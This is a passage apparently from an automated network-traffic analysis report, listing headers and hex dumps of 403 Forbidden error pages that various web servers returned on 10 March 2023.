3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:10 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: 1TRACb9Q/8sGZGf3NData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:10 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:10 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:56:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:56:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:11 GMTcontent-type: text/html; charset=iso-8859-1content-length: 199server: Apachex-iplb-request-id: 66818F27:CAD7_D5BA2110:0050_640AD48B_CA78:2EAE5x-iplb-instance: 28105Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:12 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:12 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 